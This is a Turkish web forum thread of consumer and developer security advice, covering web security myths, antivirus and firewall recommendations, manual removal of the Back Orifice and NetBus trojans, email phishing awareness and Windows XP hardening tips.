15 yazı görüntüleniyor - 1 ile 15 arası (toplam 25)
  • Yazar
    Yazılar
  • #1908

    MODERN ÇAĞIN MİTLERİ

    Web yöneticileri ve İnternet kullanıcıları hala bir takım ‘myth’lere inanıyor.

    Hackerların, bir tarayıcı penceresini ve birkaç küçük iş hilesini kullanarak, bir Web sayfasına ait veritabanlarına(kredi kartı bilgileri dahil) ulaşabildiği, bu veritabanlarının kopyasını alabildiği veya veritabanlarını tamamen silebildiği bir ortamda, Web yöneticileri ve Internet kullanıcıları halen daha bir takım ‘myth’lere(yanılgılara) inanıyor.

    Günümüzde standard hal alan güvenlik duvarları(firewall) ve yama yönetimi(patch management) uygulamaları ile r0;networkr1; (ağ güvenliği) çok güvenli bir hal amıştır. Her zaman bir adım önde olmayı hedefleyen hackerlar ise, web sayfalarının kendisine -yani uygulama (kod, veritabanı, sunucu) tarafına- yönelmişlerdir. Uluslararası araştırma kurumlarının araştırmaları da bu sonucu doğrulamaktadır. Bugün, yapılan her beş saldırının dört tanesi web uygulamalarını hedef almaktadır Peki web yoneticilerinin ve kullanıcılarının ne yaplamarı bekleniyor? Web sayfalarının güvenliğini artırmak için, aşağıda verilen beş büyük yanlış inanıştan kaçınmak gerekiyor.

    1. “Web sayfası SSL kullanıyor, o zaman güvenlidir.”

    Kendi başına SSL, bir Web sitesini güvenli kılmaz. Web sitelerinin, sayfaların alt kısımlarına koydukları SSL (küçük kilit) logoları, kullanıcı oturumundaki veri aktarımının uygun şifrelendiğini (encryption) gösterir. SSL, bilgi akışından sonra sayfada saklanan veriyi korumaz. Daha doğrusu; SSL’in, kullanıcı bilgilerinin web sayfalarının veritabanlarında saklanması ile uzaktan yakından ilgisi yoktur. Kişisel bilgiler, veritabanına işlendikten sonra, risk data akışında değil server’dadır. Bu yüzden hackerlar, aradaki veri akışının şifrelenip şifrelenmemesini umursamazlar bile. Onlar için asıl yol, web sayfalarda yer alan kod açıklarından veritabanlarına ve sunuculara erişmek, burada yer alan kullanıcı bilgilerini elde etmektir.

    2. “Firewall(Güvenlik Duvarı) Web sitesini koruyor, o zaman sayfa güvenlidir.”

    Güvenlik duvarları, bir sayfaya yönelen trafiği kontrol ederler ama sayfayı kötü niyetli kod saldırılarından koruma yeterlilikleri yoktur. Bu yüzden; firewall ile korudukları serverlarda yer alan web sayfalarında, web uygulamalarını yoğunlukla kullanan e-ticaret firmaları, bankalar ve başta büyük sanayi kuruluşları olmak üzere e-business süreçleri olan tüm kurumlar saldırılara karşı güvensiz kalıyorlar. Geleneksel ağ güvenliği mantığıyla, r0;iyi trafiğe izin ver, kötüsüne izin vermer1; yolunu izleyen firewall eirişim-kontrol listeleri(ACLs) bir ağdan geçen herşeyi engelleyerek, sadece bir kısım activiteye(Web, e-mail) izin verebilir. Bunun dışındaki tüm trafik firewall tarafından bloke edilir. Hacker tarayıcı satır çubuğundan normal bir kullanıcının sayfayı ziyaret etmesi gibi girer, bu durumda firewall’un bir anlamı kalmaz.

    3. “Vulnerability Scanner (Zaafiyet Tarayıcı) herhangi bir güvenlik açığı raporlayamadı, o zaman web sayfası güvenlidir.”

    Doksanların başından beri kullanılan ve r0;Vulnerability Scannerr1; adıyla anılan araçlar, çok bilinen bir kısım ağ güvenliği açıklarını ortaya çıkarırlar. Bununla birlikte, Web server’da çalışan, açıklarla dolu Web uygulamalarındaki zaafiyetleri tesbit edemezler. Güncel bir zaafiyet tarayıcı, ağ güvenliği açıkları kapsamında önceden bilinen zaafiyetlerin yüzde doksanlık bir kısmını raporlayabilir, ancak uygulama güvenliği konusunda, örneğin bir web sayfasının kendine özgü kodlaması ile ilgili, önceden bilinen standart açıklardan söz edilemez.

    4. “Web uygulama güvenliği yazılım geliştiricilerin bir problemidir.”

    Web sayfasının yazılımını yapan kişinin veya ekibin muhakkak problemde payı vardır ama uygulama güvenliği risklerini ortaya çıkaran birçok faktör onların kontrolü dışında gerçekleşmektedir. Mesela, kaynak kod yazılırken dışardaki sistemlerden alınmış olabilir ve dışardan sağlanan kod ile sonradan geliştirilen / değiştirilen kod birbirine karışmış olabilir. Hatta yazılım geliştiriciler örnek kod veya açık kod kullanabilirler. Yani, bir yazılım projesi için üretilen kod tabanının tek olduğu veya birbirine karışan kodların güvenli olup olmadığı hiç bir zaman kesin değildir. Mesela iki yazılımcının ayrı ayrı geliştirdiği iki yazılım kendi başlarına çok güvenli olabilirler. Ancak ikisi birer modül gibi birbirine veya ortak bir projeye entegre edilirse, olası bir güvenlik açığı riski çok daha fazladır. Düşündüğümüzde on binlerce satırlık, onlarca modüllük bir projede ortak bir tabandan bahsetmek imkansızdır. Bu da sistemin, güvenlik açığı verme riskini fazlasıyla artırmaktadır.

    Yazılım geliştiren ekibin secure coding (güvenli kod yazmak) konusunda eğitilmesi uygulama güvenliğinin sağlanması konusunda ciddi bir adım olacaktır.

    5. “Web sayfamız her sene güvenlik değerleme testlerine tabi tutuluyor, o zaman güvenlidir.”

    Web sayfası kodlarınındaki sürekli güncellenme ihtiyacı, en güncel güvenlik değerlendirme raporlarının(security assessment report) bile doğruluğu hakkında akıllarda soru işaretleri bırakıyor.

    Uygulama güvenliği süreci – her ne kadar daha sık gözden geçirme veya denetlemeleri gerektirse de – web sayfaları yılda bir veya en erken altı ayda bir değerlendirme testlerine tabi tutuluyor. Oysa web sayfasına eklenen her yeni uygulamada sayfada kod açığı oluşma riski artar.

    Mesela sevgililer günü, ramazan bayramı veya yılbaşı gibi özel günlerde, e-mağazalarına ait web sayfaların sürekli güncellenmesi için çaba harcayan teknik ekip görev yoğunluğu nedeniyle, güvenliği ikinci plana atabilmektedir. Bu tarihlerde, web sayfalarında yeni eklenebilecek ürünler, özellikler, kampanyalar vs. ile ilgili acil guncellemeler gerekmektedir ve bu yogunluk esnasında güvenlik kaygıları umursanmayabilir. Yeni eklenen kodlar güvenlik açıklarıyla dolu olabilir. Ve yılda bir yapılan denetlemeler bu açıkları buluncaya kadar, Web sayfaları çok büyük riskler taşıyabilir.

    Özetle ;

    Yılda bir defa denetleme yapılarak, vulnerability scanner adı verilen çeşitli araçlarla ağ taranarak veya gereksiz yere firewall’lara, SSL’lere onbinlerce dolar harcanarak sağlanan güvenlik çoğu hacker için hiçbir anlam ifade etmez. Bu şekilde yapılan yanlış yatırımlarla Web sayfalarının güvenliği sağlanamaz.

    Tüm bu saydığımız nedenlerle, güvenlik profesyonelleri projelerin tüm aşamalarında görev almalıdırlar. Firmalar, güvenlik konusunda yetkin personel sıkıntısı çekmeleri durumunda ise, web sitelerinin güvenliğini, güvenlik danışmanlığı firmalarına outsource etmelidirler.

    ( Whitehat Security CEO’su Jeremiah Grossman’ın ‘Security Myth’ makalesinden alıntılar içermektedir. )

    #29342

    [align=center][size=medium]Security Hakkında Genel Bilgiler[/size][/align]

    GİRİŞ

    İlk olarak güvenlik neden önemlidir sorusuna bir cevabımızın olması gerekir.Evet güvenlik niçin önemlidir?

    Özel hayat gizliligi, iş ve emek verilen bilgileri korumak gibi sebeplerden dolayı güvenlik kaçınılmaz hal almıştır.Örneğin; Zamanımızda firmalar hem verimlilik hem maliyeti düşürme hem de iletişim amacı ile kendi bilgisayar ağlarını internete bağlıyorlar ama güvenlik önlemlerini almıyorlar.Truva atları ve virüs yazma teknikleri Hakkında bilgiler internette birçok adreste anlatılır durumda.Bu programları kullanarak bilgisayar ağlarına zarar verenler ve verdirenler son zamanlarda çok kolaylaştı.

    Neredeyse her firma haberleşmelerinizi elektronik posta ile yapmakta; müşteri bilgilerini, ürün bilgilerini, muhasebe bilgilerini elektronik ortamda saklamaktadır.Pekii bu çalıştığımız bir firmadaki bu tür bilgilerin rakip firmanın eline geçebileceğinde firmanın başına neler gelebilir hiç düşündünüzmü?

    Olabilecekler;-Rakip firma planlarınızı öğrenerek sizin gelişmenize karşı tedbirler ele alır, sizin planlarınızı sizden önce devreye sokabilir,

    -Bilgilerinizi herhangi bir yolla (virüs, format vb.) kaybolmasını sağlayabilir.Bu da işlerinizin gecikmesini sağlar,

    -Rakip firma müşteri ve muhasebe bilgilerini ele geçirince firmanızın güvenligi sarsılabilir.

    Vb. birçok olumsuzluk başınıza gelebilir.

    Firma Güvenliğini birkaç başlık altında toparlayabiliriz.Bunlar ;

    -Her türlü bilgi, belge ve iletişimin yetkisiz kişilerin ellerine geçmesini engellemek amacıyla gizliliklerinin sağlanması,

    -Kurumsal dokümanların ve bilgilerin virüsler, truva atları ve yetkisiz kişiler tarafından değiştirilerek bütünlüklerinin bozulmasının engellenmesi,

    -Kurumsal bilgilere sorunsuz ve zamanında erişilebilmesi.Doğal afetler sırasında bile bilgilere sorunsuz ulaşabilmeyi sağlayabilmek,

    -Şirketin israfı önlenerek, çalışan personelin verimliliginin artırılması.

    İnternet, şu yıllarda hayatımıza neredeyse tamamen yerleşmiştir.Sohbet ve iletişimin yanında bankacılık, devletle ilgili işlemlerde artık internet üzerinden yapılıyor.Vergi borcunuzu kontrol etmek, pasaport işlemleri yapmak bunlardan bazılarıdır.

    Bu tür bilgilerin ikinci bir şahısın eline geçmesini engellemek için güvenlik tedbirleri almamız gerekmektedir.

    Dökümanlarınız, e-posta bilgileriniz ve şifreleriniz, kayıtlı oldugunuz forum şifreleri, net üzerinden giriş yaptığınız telefon numaraları gibi yapmış oldugunuz birçok işlemin güvenligini sağlamak için çeşitli yöntemlere başvurmamız gerekmektedir.

    Dökümanımızda bu çeşitli güvenlik önlemlerini bulabileceksiniz..

    VİRÜSLER

    Güvenlik denince akla ilk başta virüsler gelir.Bunlara karşı güvenlik firmaları antivirüs yazılımlar çıkarmışlardır.Hatta bazı firmalar virüsleri de kendileri yazıyor sonra antivirüs çıkartıp çıkar sağlıyorlardır.JAntivirüs kullanımında dikkat edilecek olan 3 önemli şey vardır;

    -En iyi antivirüs yazılımını tercih etmek,
    -Antivirüs yazılımınızı otomatik taramaya ayarlamak(her dosyayı kendisi taramalı),
    -Antivirüs yazılımınızı sürekli güncellemek.

    *Sisteminizi program haricinde online olarak ta scan edebileceğiniz (tarayabileceğiniz) linkleri aşağıda vereyim.

    http://housecall.trendmicro.com/
    http://us.mcafee.com/root/mfs/default.asp
    http://security.symantec.com/sscv6/default.asp
    http://www.pandasoftware.com/active…n_principal.htm
    http://www.bitdefender.com/scan/license.php
    http://www.grisoft.com/us/us_dwnl_free.php

    Birçok antivirüs yazılımını denemişimdir.Bu yüzden iyi olanlarını az çok bilirim.En iyi antivirüs yazılımları;

    Avast!

    Norton Antivirüs

    Panda Titanium Antivirüs

    NOD32 Antivirüs

    F-Prot Antivirüs

    Pc-Cillin

    EXPLORER AÇIKLARI // KORUNMA YOLLARI

    Çoğumuz internette gezinirken bilgisayarlarımıza bulaşan spywarelerden, farkında olmadan ana sayfamızın değiştirilmesinden, browserımıza arama motorları eklenmesinden bıkmış durumdayız.Aslında daha kötüsü de var.İnternette gezinirken onemli kişisel bilgilerimizin,firma bilgilerimizin,cep telefon şifrelerimizin, (süperşifre) banka hesap numaraları yada şifrelerimizin çalınma olasılığıyla beraber yaşamaktayız.

    Peki bu istenmeyen açıklıklardan nasıl korunuruz?

    Birçok kişi bu açıklara karşı program kullanmayı önerir.Tabii programda bir nevi güvenlik sağlar ama programları 2.plana almazsak açıkları kapatmış sayılmayız.

    İlk olarak sorunların asıl kaynaklarından bahsedeceğim.

    Başımıza gelen birçok sorun browser kullanımından gelmektedir.Birçoğumuz browser olarak Internet Explorer ı tercih ediyoruz.Yaygın, hazır ve kullanımı kolay oldugu için.Fakat Internet explorer açıklarıyla ilgilenmiyoruz.Bazen çok kolay birşekilde çok önemli bilgilerinizi 2.bir şahısa kaptırabiliyorsunuz browser açıklarından.

    -“application/hta” MIME türünün bir object tagı ile referans edilmesi sonucunda Explorerın scriptleri sorgusuz olarak calıştırması:

    Bu açık sayesinde site sahipleri bilgisayarınızda istediği kodu çalıştırabilmektedir.Scriptler, Explorer application/hta türünde gonderilen herhangi bir veriyi size sormadan çalıştırabilir.

    Bu açığı kapatmak istiyorsanız Windowsunuzu sürekli upload etmeniz gerekmektedir.Service Pack 2 ile bu açık ortadan kalkmıştır.

    Kısıtlanması gereken Çalışmalar;

    Yapılacak olan kısıtlama cookieler, ActiveX ler, spywareler ve çeşitli virüs yazılımlarına karşıdı yapılabilir.

    İlk önce bu çalışmaları açıklayalım

    Cookieler;İnternette girmiş oldugumuz sayfaların daha sonraki girişlerimizde otomatik olarak kendini algılamaya çalışırlar.Bunlara cookie (çerez) adı verilir.

    Örneğin;Internette herhangi bir forum üyesisiniz ve foruma giriş çıkış yapıyorsunuz.Siz farkında olmuyorsunuz fakat sizinle ilgili birçok bilgi site yöneticisine iletiliyor.Siteye ne kadar sıklıkta giriş yaptığınızı, en son ne zaman giriş yaptığınızı, ortalama online olma saatlerinizi bu bilgiler içinde sayabiliriz.Böyle çerezlerin size hiçbir zararı yoktur.Kaybedecek birşeyiniz yoktur.

    Fakat 2. olarak göreceğimiz cookie ler böyle insaflı değillerdir.İşletim sistemi bilgilerinden, Internette dolaştığımız sitelerin listelerine kadar, hatta bilgisayar sisteminde kayıtlı olan kullanıcı bilgileri de ticari amaçlı kullanmak üzere kendi bilgisayarına ulaştırır.Bu cookiler de zararlı cookielerdir.

    ActiveX’ler:ActiveX’ler bizim izin verdiğimiz siteler haricindekine sınır getirebileceğimiz uygulamalardır.Birçok sitede otomatik olarak birşeyler yüklemeye başlar.ActiveX ile buna bir çizgi çekmemiz gerekir.En azından bizim iznimiz olmadan hiçbirşey sistemimize yüklenmemelidir.

    Virüs Benzeri Yazılımlar:Bu yazılımların temel amacı; kişisel bilgileri ve kişisel ayarları ele geçirmektir.Bu yazılımları temizlemek için kayıt defterini kullanabiliriz ama önemli olan daha önceden alacağımız tedbirdir.Bunun için çeşitli yazılımlar vardır.AntiVirüs ve spyware yazılımlar bulunmaktadır.Bunları kullanabilirsiniz.

    I.Explorer Kısıtlamaları:I.Explorerımızı açtığımızda ARAÇLAR sekmesinden İnternet Seçeneklerine tıklarız.Karşımıza 7 buton çıkar.Bizi ilgilendiren “Güvenlik” ve “Gizlilik” bölümleridir.Buralarda ActiveX lerden Cookielere kadar çeşitli kısıtlamalar yapmamız mümkündür.

    Not : Internet Explorer için en büyük önerim sp2 nin sisteminizde “kesinlikle” yüklü olması gerekir.

    [size=medium]SALDIRILARDAN KORUNMAK // TEDBİRLER[/size]

    Saldırmadan önce savunmayı bilmemiz gerekir.Kendini savunamayan kişi saldırmayı bilemez ama ne tesadüftür ki saldırmayı bilen kişi de savunmayı iyi becerir.Çünkü saldırının nereden geleceğini tahmin edebilir.

    Netten gelen saldırılar genellikle “lamer”ler tarafından yapılır.Portlarınızı tararlar, ping atarlar, D.O.S , DDoS saldırıları yapabilirler.Bu saldırılara karşı firewall bir önlemdir.Firewalllar sistemi dışarıdan gelen saldırılara karşı korurlar.ADSL kullanıcıları bu konuda biraz daha şanslı çünkü, ADSL Modemlerin kendisinde firewall bulunmaktadır.İsteyen + olarak firewall yükleyip sistemini daha da güvenilir hale getirebilir tabii ki.Yine tekrarlamadan edemeyeceğim.Firewall programları işinizi görür fakat programla sorunu kesinlikle tamamen halledemezsiniz.Çözüm herzamanki gibi yine sizde..

    [size=medium]FIREWALL’LAR[/size]

    Firewall u İnternet ile bilgisayar arasında kurulan bir duvar olarak nitelendirebiliriz.Bilgisayarımızı internete bağladığımızda , bağlı olan hat üzerinden bilgisayara onlarca kapı açılır.Bu kapılardan çeşitli virüs benzeri yazılımlar girebilir.Firewall’lar bu kapıları kapamaya yararlar.Biz bu kapılara “Port” adını veriyoruz.Örneğin I.explorer 80 no’lu porttan internete giriş sağlar.

    Bilgisayar internete bağlandığı zaman doğal olarak bu portlar açılır.Ve kişilere açık açık “gelde benim sisteme gir” denilir.İşte firewall’lar burada devreye girerler.Firewall’lar bu portları kapar ve bizim iznimiz olmadan bu portlardan hiçbir giriş gerçekleşemez.

    Bana göre en iyi Firewall ları sıralamak istiyorum;

    1-Sygate Personal Firewall

    2-Norton Personal Firewall

    3-Kerio Personal Firewall

    4-Zonealarm Firewall
    Online olarak Firewall Testi yapabileceğiniz linkler;

    http://scan.sygatetech.com
    http://www.dslreports.com/scan
    http://www.hackerwatch.org/probe/
    http://www.pcflank.com/test.htm

    Online olarak portlarınızı taramak için linke tıklayınız…
    http://www.gunaydin.info/guvenlik_taramasi.php?sub=tara

    [size=medium]
    TROJANLAR[/size]

    En tehlikeli mail hack yöntemi trojan ve keylogger ile yapılır.Çünkü çalınan sadece mail şifreniz değil PC içinde bulunan tüm bilgilerden, giriş yaptığınız sitelerdeki üyeliklerinize kadar herşeyiniz hacklenebilir.Hatta neredeyse PC nizin başkalarının kontrolüne geçtiğini söyleyebiliriz.Bundan korunma yöntemi ise, MSN den veya mail yoluyla gönderilen hiçbir .exe dosyasını kabul etmeyiniz, download etmeyiniz.İndirmiş oldugunuz her dosyayı antivirüsten geçirmelisiniz.

    Trojan mailler de bu başlık altına girer.Örneğin bir mailde size link verilir ve tıkladığınızda karşınıza anlaşma gelir siz burada evet hayır seçeneklerinden hayır ı tıklayarak kurtulabilirsiniz..

    Şimdi birkaç Trojan tesbitinde bulunalım.CW deki bir arkadaşımızın hazırladığı dökümanından alıntı yapıp derledim…

    BO Trojan Tespiti

    1.Başlat > Çalıştır > Kayıt Düzenleyicisini Çalıştırın (Çalıştır da regedit yazıp Entere basın) 2.HKEY_LOCAL_MACHINE > Software > Microsoft > Windows > CurrentVersion anahtarını açın.

    2.Bu anahtarda iken Run, RunOnce, RunOnceEX, RunServices, RunServicesOnce alt tuşlarına tek tek bakarak aşağıdakine benzer değerleri arayın.

    “.EXE” satırını gördüyseniz sisteminizde BO Trojanı var demektir.

    Bu program, her Windows Oturumu’nunu açtığınızda diğer programlarla birlikte çalışır.

    Dolayısı ile diğer satırlara dokunmadan, yukarıdaki adı içeren satırı silin.

    4.Bilgisayarınızı yeniden başlatın.

    5.Windows gezginiyle WindowsSystem klasörüne bakın.

    Burada 122 kBayt uzunluşunda adı olmayan bir dosya göreceksiniz.

    Silin ve aynı klasörde WINDLL de DLL dosyasını bulun ve silin.

    Her iki dosya da BO Trojanı dosyalarıdır.

    BO Trojanından kurtuldunuz, şimdi Bilgisayarınızı yeniden başlatın.Trojan dosyaları farklı isimlerde olabilir.Emin olmak için, Başlat>Bul>Dosyalar ve Klasörler’i açın.

    Konum olarak Windows klasörünü belirtin ve Gelişmiş sekmesine geçin.

    Metin kutusuna “bofile” yazarak aramaya başlayın.Bulunan dosyalar BO Trojanı dosyalarıdır.

    Dosya isimlerini biryere not edin ve yukarıdaki kayıt anahtarında bu isimleri bulup o anahtarı ve dosyaları silin.

    NetBus Trojanı Tespiti

    1.Başlat/Çalıştırdan Kayıt Düzenleyicisini Çalıştırın (REGEDIT yazıp Entere basın).

    2.HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurren tVersion anahtarını açın.

    3.Bu anahtarda iken Run, RunOnce, RunOnceEX, RunServices, RunServicesOnce alt tuşlarına tek tek bakarak aşağıdakine benzer değerleri arayın.

    “PATCH.EXE satırını gördüyseniz sisteminizde NetBus Trojanı var demektir.

    Bu program, her windows oturumunda çalışması gereken diğer programlarla birlikte Çalışır.

    Dolayısı ile diğer satırlara dokunmadan, yukarıdaki adı içeren satırı silin.

    4.Bilgisayarınızı yeniden başlatın.

    5.Windows gezginiyle Windows çekmecesine bakın.

    Burada 400 Kb civarı uzunluğunda “PATCH.EXE” dosyasını göreceksiniz.

    Silin! NetBus Trojanından kurtuldunuz.

    Sonra da bilgisayarınızı reset’leyin.

    Şimdi tüm internet şifreleriniz değiştirmelisiniz!.İnternete bağlanmanızı sağlayan şifrelerinizi ve diğer tüm önemli internet şifrelerinizi değiştirmeyi de unutmayın, çünkü bu şifreler 2. bir şahısın eline geçmiş olabilir.

    [size=medium]E-POSTA GÜVENLİĞİ // TEDBİRLER[/size]

    E-posta güvenliği genel olarak kişinin dikkatine bağlıdır.Bilinen yöntemlerden bahsedelim.

    1. Gizli soru

    2. Fake Mail

    3. Trojan ve keylogger

    4. Şifre Tahmini

    5. Database Çalımı

    1-Gizli Soru

    Birçok kişinin 2. mail şifresi diyebiliriz.Şifremizi unuttuğumuzda gizli soru vasıtasıyla geri almamızı sağlarız.Fakat birçok kişi gizli sorularını “Adım ne, Ben Kimim, Sen Kimsin vb. şekilde kolay yapmaktadırlar.Tabi sorusu kolay olupta cevabı zor olanlarda var.Size önerim cevabınızı sorunuzla hiç alakası olmayan birşey yapın.Örn soru “Who is first Turkish Hacker?” cevabı da “Ben iyiyim sende iyisindir inşallah” gibi saçma yapabilirsiniz.Ben şahsen gizli soru cevabımı bilmem

    Not:Yahoo ve mynet in bu açıklara karşı doğum tarihi gibi bir güvenlik eklemiştir denemeyiniz.

    2-Fake Mail
    En çok kullanılan yöntem fake maildir.Birçok kişi aaa hala fake mail yiyen mi var diye dalga geçsede, uzmanca hazırlanmış bir fake gerçekten büyük sorunlara yol açabilir.Hiç beklenmedik bir anda bir bakarsınız mailiniz hacklenmiş.Yöntem: fake mail.Buna karşı yapacağınız tek şey; Size mail şifrenizi isteyen hiçbir yere cevap vermemenizdir.

    Mynetten yollanmış gibi gösterilen bir fake te “Mynet artık 3 GB alan veriyor.Aşağıdaki linkten hesabınıza giriş yapınız ve 3 GB lık hesabınızı aktive ediniz.” yazabilir.Bunda hemen heyecanlanıp giriş yapan arkadaşlarımız çok oluyorBurada önemli olan dikkattir.Bu yüzden şifre isteyen hiçbir maile güvenmeyin!

    3-Trojan ve Keylogger

    Trojan bölümündeki yazıları tekrarlayalım…

    En tehlikeli mail hack yöntemi trojan ve keylogger ile yapılır.Çünkü çalınan sadece mail şifreniz değil PC içinde bulunan tüm bilgilerden, giriş yaptığınız sitelerdeki üyeliklerinize kadar herşeyiniz hacklenebilir.Hatta neredeyse PC nizin başkalarının kontrolüne geçtiğini söyleyebiliriz.Bundan korunma yöntemi ise, MSN den veya mail yoluyla gönderilen hiçbir .exe dosyasını kabul etmeyiniz, download etmeyiniz.İndirmiş oldugunuz her dosyayı antivirüsten geçirmelisiniz.

    Trojan mailler de bu başlık altına girer.Örneğin bir mailde size link verilir ve tıkladığınızda karşınıza anlaşma gelir siz burada evet hayır seçeneklerinden hayır ı tıklayarak kurtulabilirsiniz..

    4-Şifre Tahmini

    Artık hack ile ilgilendiğinize göre zaten bu yöntemle hackleneceğinizi gözününe almamak lazım ama yine de açıklayalım.Kişi bilgisayarının başına geçip sizin koyabileceğiniz şifreleri tahmin etmeye çalışır ve tek tek dener.Ama zaten birkaç denemeden sonra mail girişi donduruluyor.

    5-Database Çalımı

    Burda dikkat edilmesi gereken tek şey hiçbir sitede kullandığınız şifreyi mail şifrenizle aynı yapmayınız.Sizin üye oldugunuz bir sitenin DB (database)sini ele geçiren bir kişi DB de tüm şifreleri eline geçirir ve şifreler karşısına gelir.md5 li de olsa sonuçta kırabilirse mailinizi eline geçirir.Bu yüzden hiçbir sitedeki şifreniz mail şifrenizle aynı olmasın.

    [size=medium]GÜNCELLEMELER[/size]

    Sisteminizin genel olarak güvenliğin sağlamak için sürekli upload etmelisiniz.

    Windows Güncellemeleri;

    Windowsunuzu sürekli güncellemeniz size güvenlik konusunda çok yardımcı olacaktır.

    Bilgisayarınızın güvenliğini sağlamak için yapacağınız upload linki;

    http://windowsupdate.microsoft.com

    Office yazılımlarının güvenliğini de ;
    http://officeupdate.microsoft.com adreslerinden upload ederek sağlayabilirsiniz.

    Windows güncellemeleri otomatik olarak ayarlanabilir.Bu da size bir kolaylık sunar.Otomatik güncelleştirmeyi ayarlamak için ;

    Bilgisayarım’a sağ tıklayın > Özellikler > Otomatik Güncelleştirme’ye gelerek ayarlarınızı yapabilirsiniz..

    Güncellemeler virüslere karşı alınabilecek önlemler arasında önemlidir.Bu yüzden kesinlikle güncellemelerinizi aksatmayınız..

    [size=medium]AÇIKLAMA: [/size]

    Virüslere, spyware’lere daha genel konuşursak “hacker” lara karşı hazırlıklı olmamız gerekmektedir.Güvenliğinden emin olmadığınız hiçbir şeyi download etmeyin, sisteminizin güncellemelerini yapın, antivirüs & spyware yazılımlarınızı sürekli güncel tutun, ve kimseye güvenmeyin..Dökümanda anlatılanları gerçekleştirirseniz güvenliğinizi büyük bir ölçüde sağlamış olursunuz..

    Birçok yerden okuduğumuz dökümanların genel anlamıyla anlatmak istediklerini tek doküman altında birleştirdim.Umarım beğenirsiniz..

    #29343

    * Güvenlik bir ölçümdür, özellik değildir.

    Ne yazıkki bazı yazılım projesinde geliştiriciler güvenliği sağlanması gerekenler listesine koyuyor. ‘Güvenli mi?’ sorusu en az ‘Sıcak mı?’ sorusu kadar görecelidir.

    * Güvenlik ihtiyacı proje maliyeti sınırlarıyla dengelenmelidir.

    Yazılım uygulamalarının çoğu için yeterli seviyede güvenliği sağlamak kolay ve düşük maliyetlidir. Eğer güvenlik ihtiyacı çok önemli ise ve işlenen veriler çok değerli ise, güvenlik seviyesi artırılır. Bu da güvenlik maliyetinin artmasına sebep olur. Bu maliyet dengesini ayarlarken tabiki projenin bütçesi dikkate alınmalıdır.

    * Güvenlik ihtiyacı uygulamanın kullanışlılığı ile dengede tutulmalır.

    Güvenliği sağlamak için koyulan kuralların uygulamanın kullanım kolaylığını azaltığı kabul edilen bir gerçektir. Şifreler, oturum sonlandırma ve giriş kontrolleri normal kullanıcılar (yasal kullanıcılar, uygulamayı kurallar içerisinde kullananlar) tarafından can sıkıcı engeller olarak görülürler.Bu basamaklar çoğu zaman gereklidir. Her uygulamaya uygun tek bir çözüm yoktur ve çözüm geliştirirken normal kullanıcıların da düşünülmesi gerekir.

    * Güvenlik proje tasarımının bir parçası olmalıdır.

    Proje güvenlik ihtiyaçları düşünülmeden tasarlanırsa ilerleyen safhalarda güvenlik sorunları içinden çıkılamaz hale gelir. Çok iyi programlama yapılsa bile kötü tasarlanmış projeler başarıya ulaşamıyacaktır.

    #29344

    Öncelikle baska bir alan icin hazirladigim bu makalede XP kullanicilarin saldirilara maruz kalmalarini ve sorun yasamalarini azaltabilecek önerileri derlemeye calisacagim.
    En büyük güvenlik önleminiz standart ayarlarin disina cikmak yolu ile yani default ayarlari degistirmekle saglarsiniz. Administrator (Admin) yetkileri olmadan calismak iyi bir secenek, buna benzer secenekleri ne sekilde kullanabileceginizi 5 degisiklik altinda toplayip kisaca kolay hatirlanmasi icin 10 öneri ile daha güvenli bir XP listesi olusturmak istiyorum.

    1.Yetkisiz kullanici olarak calismak:
    Windows Xp farkli kullanici yetkilerine imkan tanir. Bunlar arasinda Admin yetkisi ile calisan kullanicilara herhangi bir sinirlama getirilmez. Bu durum Virüsler tarafindan da kullanilmakta ve eger Admin yerine kullanici yetkisi altinda calisirsaniz bircok Virüs zararli olma olanagini bulamiyacaktir. Güncel bütün Solcanlar (Wurm) sisteme yerlesebilmek icin Admin yetkilerine ihtiyac duymaktadir bu bakimdan sinirlandirilmis yetkiler ile calismanizi öneririm. Tabiiki bu durum sorun da yaratabilmekte, yazilim kurmaniz, sürücü yüklemeniz bu durumda tamamiyle mümkün olmayabilir. Bu durumu asmaniz icin cesitli olanaklar mevcut örnegin setup dosyasini sag mouse ile „olarak calistir“ secenegi burda yeni bir iletisim penceresi ile karsilasip Admin olarak login olabilirsiniz ancak bu her zaman gecerli degildir, bu bakimdan bir projemizi yetkiler arasinda gecis yapmanizi sagliyacak bir programi gelistirmek üzere gerceklestirecegiz.

    2. Kullanicilar olusturmak ve yetkileri düzenlemek : Öncelikle yetkileri sinirli (yetkisiz) bir kullanici olusturmak durumdasiniz. Bunun icin sol altda kalan baslangic>Ayarlar>System yönetimi>Kullanici Hesaplari ve burada yeni kullanici hesabi secip bu hesap adini belirlemelisiniz ve devam etmek icin „devam“ secenegine tikladiktan sonra „Sinirli“ kismini isaretledikten sonra „Hesap Olustur“ secilip islem tamamlanmalidir.
    Olusturdugunuz bu hesap ile Admin yetkili hesabiniz arasinda gecis yapmak icin proje ürünümüz olan „XXX“ programini kullanabilirsiniz.

    “Corsan” nickli kullanicinin önerisi:
    “baslangic>Ayarlar>System yönetimi>Kullanici Hesaplari” yada “Denetim Masasi>Kullanici Hesaplari” yerine daha kullanisli olan “Baslat>Çalistir>control userpasswords2” kullanilmasi”Alıntı:

    3. Ek Firewall kurulmasi:
    SP2 nin kurulmasi ile ek ve gelistirilmis ve agbaglantisi durumunda otomatik olarak aktiv olan bir XP FW sahibi oldunuz ancak microsoft tarafindan abartilan bu cözümün yetersiz kaldigi bilinen bir gercek örnegin yerel agda paylasima acilmis bir klasör yada dosya www üzerinden görülebilir ve ulasilabilir durumda kalmasi yada Beagle-AT nin bu FW nin calismasini zorlanmadan sonlandirmasi gibi üstelik XP güvenlik merkezi bu kapanmayi bildirmiyor! Bu bakimdan ek bir FW nin kurulmasi fayda sagliyacaktir. Ücretli/Ücretsiz kullanabileceginiz ve uygun FW icin linkler makalemin sonunda derlenmistir.Halen bir FW kullaniyorsaniz leak testinden gecirmenizde fayda var http://www.firewallleaktester.com/leaktest1.htm.Ayrica bu konu ile ilgili olarak criminal2 nin konvansyonel olmayan bir FW üzerinde calistigini da hatirlatmak isterim.

    4. Antivirüs Programinin devreye sokulmasi:
    SP2 nin Yeni Data Execution Prevention (DEP) Virüslere karsi bir koruma saglamayi hedeflemistir ancak bunun gerceklesmedigi ve bir bekcilik görevini de tasimadigi biliniyor. Bu bakimdan Antivirüs (AV) programi kurmaniz ve bunu devrede tutmaniz önemli. Ücretli/Ücretsiz kullanabileceginiz ve uygun FW icin linkler makalemin sonunda derlenmistir.Halen bir AV kullaniyorsaniz testvirus testinden gecirmenizde fayda var http://www.testvirus.org/

    5. Internet Explorer (IE) (Browser Secimi)
